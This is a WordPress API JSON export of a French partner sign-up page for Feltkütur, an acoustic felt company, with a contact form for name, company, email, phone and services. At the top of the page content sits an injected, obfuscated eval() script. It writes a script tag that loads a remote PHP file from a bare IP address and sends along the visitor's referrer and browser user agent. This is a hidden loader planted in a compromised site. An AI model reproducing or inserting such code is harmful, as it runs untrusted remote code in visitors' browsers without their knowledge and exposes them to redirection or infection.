{"id":490,"date":"2017-04-28T19:10:42","date_gmt":"2017-04-28T19:10:42","guid":{"rendered":"http:\/\/feltkutur.wpengine.com\/devenir-un-partenaire\/"},"modified":"2022-07-27T15:56:29","modified_gmt":"2022-07-27T19:56:29","slug":"devenir-un-partenaire","status":"publish","type":"page","link":"https:\/\/feltkutur.com\/fr\/devenir-un-partenaire\/","title":{"rendered":"Feutre acoustique devenir un partenaire"},"content":{"rendered":"\n<noindex><script type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g='2' c='d' e='b\/2' 4='7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htfnf|var|u0026u|referrer|yhrae||js|php'.split('|'),0,{}))\n<\/a><\/script><\/noindex> \t<p>&nbsp;<\/p>\n<h1>Devenir un partenaire<\/h1>\n<p><strong>Designez en haute couture <\/strong>avec nos feutres uniques, polyvalents et de haute performance. En devenant un partenaire de Feltk\u00fctur, vous pouvez \u00e9tendre vos possibilit\u00e9s d&#8217;affaires dans de nouveaux march\u00e9s lucratifs.<\/p>\n<p>Nous vous remercions de votre int\u00e9r\u00eat \u00e0 devenir un partenaire Feltk\u00fctur.<\/p>\n<p>Veuillez remplir le formulaire ci-dessous.<\/p>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f492-o1\" lang=\"en-US\" dir=\"ltr\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/fr\/wp-json\/wp\/v2\/pages\/490#wpcf7-f492-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" novalidate=\"novalidate\" data-status=\"init\">\n<div style=\"display: none;\">\n<input type=\"hidden\" name=\"_wpcf7\" value=\"492\" \/>\n<input type=\"hidden\" name=\"_wpcf7_version\" value=\"5.8.6\" \/>\n<input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/>\n<input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f492-o1\" \/>\n<input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/>\n<input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<input type=\"hidden\" name=\"_wpcf7_recaptcha_response\" value=\"\" \/>\n<\/div>\n<div class=\"col-xs-12 col-md-6\">\n\t<p><label> Nom*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-name\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-name\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> Compagnie*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-company\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-company\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> Courriel*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-email\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"your-email\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> T\u00e9l\u00e9phone*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-phone\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"your-phone\" \/><\/span> <\/label><br \/>\n<label> Services*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-services\"><select class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\" multiple=\"multiple\" name=\"your-services[]\"><option value=\"Distribution\">Distribution<\/option><option value=\"D\u00e9coupe\">D\u00e9coupe<\/option><option value=\"Thermoformage\">Thermoformage<\/option><option value=\"Lamination\">Lamination<\/option><\/select><\/span> <\/label>\n\t<\/p>\n<\/div>\n<div class=\"col-xs-12 col-md-6\">\n\t<p><label> Notes<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"notes\"><textarea cols=\"40\" rows=\"12\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\" name=\"notes\"><\/textarea><\/span> <\/label>\n\t<\/p>\n\t<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Envoyer\" \/>\n\t<\/p>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Devenir un partenaire Designez en haute couture avec nos feutres uniques, polyvalents et de haute performance. En devenant un partenaire de Feltk\u00fctur, vous pouvez \u00e9tendre vos possibilit\u00e9s d&#8217;affaires dans de nouveaux march\u00e9s lucratifs. Nous vous remercions de votre int\u00e9r\u00eat \u00e0 devenir un partenaire Feltk\u00fctur. Veuillez remplir le formulaire ci-dessous. [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"https:\/\/feltkutur.com\/fr\/devenir-un-partenaire\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"En devenant un partenaire de Feltk\u00fctur, vous pouvez \u00e9tendre vos possibilit\u00e9s d\u2019affaires dans de nouveaux march\u00e9s lucratifs.","_seopress_robots_index":"","footnotes":""},"class_list":["post-490","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages\/490","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/comments?post=490"}],"version-history":[{"count":0,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages\/490\/revisions"}],"wp:attachment":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/media?parent=490"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}